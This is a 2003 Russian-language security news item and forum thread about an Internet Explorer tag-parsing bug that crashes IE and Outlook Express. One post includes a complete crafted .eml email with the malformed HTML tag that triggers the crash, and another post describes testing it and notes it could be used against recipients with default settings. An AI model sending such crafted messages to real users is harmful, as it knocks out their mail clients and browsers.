Пользователям IE опять пора бояться cybervlad // 07.05.03 10:41
Обнаруженная ошибка при разборе тегов приводит к аварийному завершению программы. [Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/05/07.html] Теперь для скрипт-кидди есть развлечение - рассылать e-mail в html-формате со злобными тегами...
...и в этом HTML есть вышеуказанный зловредный код, то аутглюк должен красиво упасть, потому что при просмотре такого письма от подгружает IE как in-place OLE (ActiveX), и скорее всего в своём же адресном пространстве, поэтому исключение ослика завалит аутглюк...
Сегодня исследовал поведение этого почтовика... Аутглюк умирает, но не сдаётся ;-)13.05.03 22:09 Автор: HandleX <Александр М.> Статус: The Elderman
Если текст (ниже) вы сохраните в простом текстовом формате в файл с расширением *.eml, то сами сможете всё это посмотреть...
From: "Alex" <somebody@mail.ru>
To: <somebody@pisem.net>
Subject: =?koi8-r?B?6MXMzM8h?=
Date: Wed, 14 May 2003 00:37:03 +0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0005_01C319B0.F09A7A20"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C319B0.F09A7A20
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: quoted-printable
Hi!
------=_NextPart_000_0005_01C319B0.F09A7A20
Content-Type: text/html;
charset="koi8-r"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dkoi8-r">
<META content=3D"MSHTML 6.00.2800.1170" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD><FONT face=3DArial><FONT size=3D2>
<!-- > <INPUT TYPE CODE>
<BODY>
<DIV>Hi!</DIV></BODY></HTML></FONT></FONT>
------=_NextPart_000_0005_01C319B0.F09A7A20--
---
Ну и дальше в мелкософт как чувствовали, что может произойти такое. Если это письмо проводником с помощью drug&drop бросить во «входящие», то аутлук падает с ошибкой. Можно себе представить, что аутлук при повторной загрузке сразу открывает папку «входящие», а там опять это письмо ;-) Но вот что он показывает вместо письма в этом случае:
«Outlook Express did not shutdown correctly
The last time you ran Outlook Express it did not exit correctly. In case this was due to a problem with the last message you were viewing, the message is not being shown».
так что в M$ тоже не лохи ;-)
а АутГлюк как?12.05.03 13:50 Автор: JINN <Sergey> Статус: Elderman Отредактировано 12.05.03 13:53 Количество правок: 1
> А может кто сможет этот код в HTML в АутГлюк вставить и > рассказать падает он или нет? > А то у меня ломает винды ставить Создал в БАТе письмо, приаттачил файл crash.html, отправил себе же, забрал аутлуком почту, ткнул в аттач, ответил "Да, я хочу открыть вложение", открылось окно IE и тут же "упало" с сообщением
"Программа выполнила недопустимую операцию и будет закрыта" Сведения :
Программа EXPLORER вызвала сбой при обращении к странице памяти
в модуле SHLWAPI.DLL по адресу 0167:70bf4fee."
Отвечаем "Закрыть", получаем ещё одно сообщение "Произошла ошибка в IE. Работа обозревателя будет завершена. При повторении ошибки перезагрузите компьютер".
Жмём "ОК"- "зависнувшее" окно закрывается, работу можно продолжать-)
Добавлю : ВСЕ остальные окна и приложения при этом работают без проблем, в частности половина этого сообщения была написана при висящем предупреждении об ошибке.
Версия Аутлук-а 6.00.2600
Так что если повезёт найти адресата, у которого все настройки дефолтовые, типа "ВСЁ СРАЗУ открывать и ни о чём не предупреждать", баг можно использовать.
подробно о проекте
Анализ криптографических сетевых...
